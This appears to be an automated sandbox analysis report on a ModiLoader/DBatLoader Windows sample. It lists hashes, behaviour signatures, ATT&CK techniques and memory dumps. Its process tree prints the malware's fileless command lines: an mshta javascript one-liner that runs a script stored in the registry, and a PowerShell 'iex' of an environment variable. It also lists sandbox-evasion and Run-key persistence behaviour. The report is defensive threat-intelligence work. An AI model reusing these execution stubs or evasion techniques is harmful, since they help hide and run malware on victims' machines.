Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    14-05-2024 12:12

General

  • Target

    4172450c063164dcb0df17869454d02a_JaffaCakes118.exe

  • Size

    282KB

  • MD5

    4172450c063164dcb0df17869454d02a

  • SHA1

    94e0450729822708152b9eee33c090dd2176812e

  • SHA256

    ef25313a7b59df43c2150b052bd58e16e9d8df408037cd15e4bf9f4f60edc70f

  • SHA512

    a7ba57f121233d0bfaeb639e4e2f2397be667d70e61a309599bf182d09862d6fb154d3ec6f3de730c4552905e864c0abf3a5304a72a476fec7d7b08155cf1623

  • SSDEEP

    6144:t/gYfjNgR9sBfRO0HDhhFFd4Dx0DdO/uhUjL/GnFn3Xyk7:t/gwuR9sBfR9hfBdO/WFnHyQ

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
  • ModiLoader Second Stage 54 IoCs
  • Adds policy Run key to start application 2 TTPs 2 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4172450c063164dcb0df17869454d02a_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\4172450c063164dcb0df17869454d02a_JaffaCakes118.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2400
    • C:\Users\Admin\AppData\Local\Temp\4172450c063164dcb0df17869454d02a_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\4172450c063164dcb0df17869454d02a_JaffaCakes118.exe"
      2⤵
        PID:2940
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" javascript:D4aBpnl="dUjuu";m2t=new%20ActiveXObject("WScript.Shell");coInP88oO="zgcN";ATBz3=m2t.RegRead("HKLM\\software\\Wow6432Node\\juMnFO2Ir\\2yXPMyDL");xglogFM5F1="Vr2LgsVX7";eval(ATBz3);zqz4MCmeK="96";
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2744
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:ccqlmwz
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2812
        • C:\Windows\SysWOW64\regsvr32.exe
          regsvr32.exe
          3⤵
          • Looks for VirtualBox Guest Additions in registry
          • Looks for VirtualBox drivers on disk
          • Adds policy Run key to start application
          • Looks for VMWare Tools registry key
          • Checks BIOS information in registry
          • Deletes itself
          • Adds Run key to start application
          • Maps connected drives based on registry
          • Modifies Internet Explorer settings
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:2800
          • C:\Windows\SysWOW64\regsvr32.exe
            "C:\Windows\SysWOW64\regsvr32.exe"
            4⤵
              PID:2208

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Persistence

      Boot or Logon Autostart Execution

      2
      T1547

      Registry Run Keys / Startup Folder

      2
      T1547.001

      Privilege Escalation

      Boot or Logon Autostart Execution

      2
      T1547

      Registry Run Keys / Startup Folder

      2
      T1547.001

      Defense Evasion

      Virtualization/Sandbox Evasion

      3
      T1497

      Modify Registry

      3
      T1112

      Discovery

      Software Discovery

      1
      T1518

      Query Registry

      4
      T1012

      Virtualization/Sandbox Evasion

      3
      T1497

      File and Directory Discovery

      1
      T1083

      System Information Discovery

      3
      T1082

      Peripheral Device Discovery

      1
      T1120

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/2208-42-0x0000000000F60000-0x0000000000F67000-memory.dmp
        Filesize

        28KB

      • memory/2208-46-0x0000000000090000-0x0000000000152000-memory.dmp
        Filesize

        776KB

      • memory/2208-47-0x0000000000090000-0x0000000000152000-memory.dmp
        Filesize

        776KB

      • memory/2208-48-0x0000000000090000-0x0000000000152000-memory.dmp
        Filesize

        776KB

      • memory/2208-49-0x0000000000090000-0x0000000000152000-memory.dmp
        Filesize

        776KB

      • memory/2208-50-0x0000000000090000-0x0000000000152000-memory.dmp
        Filesize

        776KB

      • memory/2208-45-0x0000000000090000-0x0000000000152000-memory.dmp
        Filesize

        776KB

      • memory/2208-44-0x0000000000F60000-0x0000000000F67000-memory.dmp
        Filesize

        28KB

      • memory/2800-30-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-62-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-23-0x0000000000F60000-0x0000000000F67000-memory.dmp
        Filesize

        28KB

      • memory/2800-72-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-26-0x0000000000F60000-0x0000000000F67000-memory.dmp
        Filesize

        28KB

      • memory/2800-27-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-71-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-28-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-29-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-31-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-33-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-32-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-39-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-34-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-41-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-40-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-38-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-37-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-36-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-35-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-70-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-52-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-54-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-55-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-56-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-57-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-58-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-59-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-51-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-53-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-64-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-69-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-68-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-67-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-66-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-65-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-63-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-60-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2800-61-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2812-20-0x0000000006180000-0x0000000006242000-memory.dmp
        Filesize

        776KB

      • memory/2812-24-0x0000000006180000-0x0000000006242000-memory.dmp
        Filesize

        776KB

      • memory/2940-4-0x0000000000400000-0x0000000000436000-memory.dmp
        Filesize

        216KB

      • memory/2940-5-0x0000000000400000-0x0000000000436000-memory.dmp
        Filesize

        216KB

      • memory/2940-6-0x0000000001DC0000-0x0000000001E82000-memory.dmp
        Filesize

        776KB

      • memory/2940-8-0x0000000001DC0000-0x0000000001E82000-memory.dmp
        Filesize

        776KB

      • memory/2940-10-0x0000000001DC0000-0x0000000001E82000-memory.dmp
        Filesize

        776KB

      • memory/2940-9-0x0000000001DC0000-0x0000000001E82000-memory.dmp
        Filesize

        776KB

      • memory/2940-7-0x0000000001DC0000-0x0000000001E82000-memory.dmp
        Filesize

        776KB

      • memory/2940-11-0x0000000001DC0000-0x0000000001E82000-memory.dmp
        Filesize

        776KB

      • memory/2940-2-0x0000000000400000-0x0000000000436000-memory.dmp
        Filesize

        216KB